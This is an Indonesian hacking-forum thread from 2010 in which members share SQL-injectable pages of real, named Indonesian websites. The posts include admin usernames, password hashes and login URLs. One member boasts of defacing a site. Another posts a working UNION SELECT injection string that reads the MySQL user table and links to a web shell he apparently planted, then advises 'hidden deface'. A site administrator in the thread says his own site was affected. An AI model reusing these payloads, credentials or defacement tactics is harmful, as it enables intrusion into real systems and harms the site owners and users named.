bug sql lagi neh...

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
danang cool
Posts: 13
Joined: Fri Nov 14, 2008 12:40 pm

bug sql lagi neh...

Post by danang cool » Mon May 31, 2010 10:18 pm

http://www.beraucoal.co.id/

login:http://www.beraucoal.co.id/login.php

user:dini
pass:xxxxxx
user:administrator
password:xxxxxx :love: :love: :love: :love:
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:

http://www.perpus-klaten.net/
login:http://www.perpus-klaten.net/login.php
user:admin
pass:xxxxxx
level:super
Top
User avatar
shinichi81
Posts: 137
Joined: Tue Jan 19, 2010 6:25 pm
Location: Bandung Van Java

Re: bug sql lagi neh...

Post by shinichi81 » Mon May 31, 2010 10:34 pm

makasih bos...tapi tidak bisa login nih...soalnya login.php sepertinya dah di enkripsi lagi yah bos.. :tapa: :tapa:
............make a wish............
Top
danang cool
Posts: 13
Joined: Fri Nov 14, 2008 12:40 pm

Re: bug sql lagi neh...

Post by danang cool » Mon May 31, 2010 10:43 pm

iya bos..aku sampe puyeng nih...
ni ada lagi...

http://gigi.klikdokter.com/article.php?id=3

iluni:1f14598500e044cb
klikdokteradm:1eabc305578153ef
admin:0d2f851159999c86

tadi tak decrypt md5 muncul lagi enkripsi baru...duh bisa minta bantuan para master.... :circle:

tambah lagi..tapi makin puyeng soalnya gak tahu di enkrip pake apa... :omg: :omg:

http://dymarjaya.co.id/newsdetail.php?id=5

ÔÍÛÞÐ:·âÛÖÔ¥™Ÿ¥
Top
danang cool
Posts: 13
Joined: Fri Nov 14, 2008 12:40 pm

Re: bug sql lagi neh...

Post by danang cool » Tue Jun 01, 2010 4:59 pm

tambahan bug baru...
http://www.smkn2bukittinggi.com/gallery.php?id=5

user:admin
passw:b1n4ryd3cac1c5c186529188692e083b2cff2454e2432b
user:developer
passw:b1n4ry1e4b846ce1a0cdfe819efe7b224ead9203b5f25f

login:http://www.smkn2bukittinggi.com/admin/login.php
monggo silahkan diteruskan... :devil :devil

lagi....http://www.yamaha-vega.or.id/article.ph ... 0701090001
user:redaksi
pasw:xxxxxx
user:bimos
passw:xxxxxx

http://www.krlmania.com/gerbong/read.php?id=1792

ta[i gak ketemu user adminnya...cuma user2 biasa :mati:
Top
cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: bug sql lagi neh...

Post by cyber_criminal » Tue Jun 01, 2010 6:19 pm

yg http://www.yamaha-vega.or.id/ udah di deface bro !!!
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.
Top
danang cool
Posts: 13
Joined: Fri Nov 14, 2008 12:40 pm

Re: bug sql lagi neh...

Post by danang cool » Tue Jun 01, 2010 6:29 pm

itu ane yang deface bro...setelah ane deface pake gambar dari x code..
initial j0ck3r.... :devil :devil
Top
danang cool
Posts: 13
Joined: Fri Nov 14, 2008 12:40 pm

Re: bug sql lagi neh...

Post by danang cool » Tue Jun 01, 2010 7:15 pm

http://www.pabanyuwangi.net/index.php?aksi=detail&id=25

user:admin
pass:b88fa6e1825bba17e64439e50c09223c
login page :http://www.pabanyuwangi.net/admin
:maaf: :maaf:
Top
User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:
Contact 3xtr3m3b0y

Re: bug sql lagi neh...

Post by 3xtr3m3b0y » Wed Jun 02, 2010 3:25 am

danang cool wrote:iya bos..aku sampe puyeng nih...
ni ada lagi...

http://gigi.klikdokter.com/article.php?id=3

iluni:1f14598500e044cb
klikdokteradm:1eabc305578153ef
admin:0d2f851159999c86

tadi tak decrypt md5 muncul lagi enkripsi baru...duh bisa minta bantuan para master.... :circle:
Mgkn itu bukan tabel yg tepat Om, coba cek tabel yg lain
Kayakx user database yg aktif setingkat ROOT, soalnya bisa buka database mysql:

Code: Select all

http://gigi.klikdokter.com/article.php?id=-3+union+select+1,2,user(),database(),5,6,7+from+mysql.user--
Monggo dikembangkan lebih lanjut, tutornya sdh ada dibahas sebelumnya.
Hasilnya sementara sprt ini:

Code: Select all

http://www.klikdokter.com/userfiles/.3xtr3m3b0y.php
NB: For educational only...!!!
...n0 l1m17...
Top
nenenporeper
Posts: 2
Joined: Fri Jun 04, 2010 11:54 am

Re: bug sql lagi neh...

Post by nenenporeper » Fri Jun 04, 2010 1:43 pm

lagi....http://www.yamaha-vega.or.id/article.ph ... 0701090001
user:xxxxxx
pasw:xxxxxx
user:xxxxxx
passw:xxxxxx

web yang gw urus neey :cry:
Top
User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:
Contact 3xtr3m3b0y

Re: bug sql lagi neh...

Post by 3xtr3m3b0y » Fri Jun 04, 2010 2:02 pm

nenenporeper wrote:lagi....http://www.yamaha-vega.or.id/article.ph ... 0701090001
user:xxxxxx
pasw:xxxxxx
user:xxxxxx
passw:xxxxxx

web yang gw urus neey :cry:
Segera di patch Om, Pass di enkripsi serta diganti...

NB: Buat teman2 please jgn share Password di forum terutama Password yg tdk terenkripsi, jika mo deface sebaiknya gunakan HIdden Deface, jgn melakukan daface pada halaman utama...
...n0 l1m17...
Top
Post Reply

Return to “Web Hacking”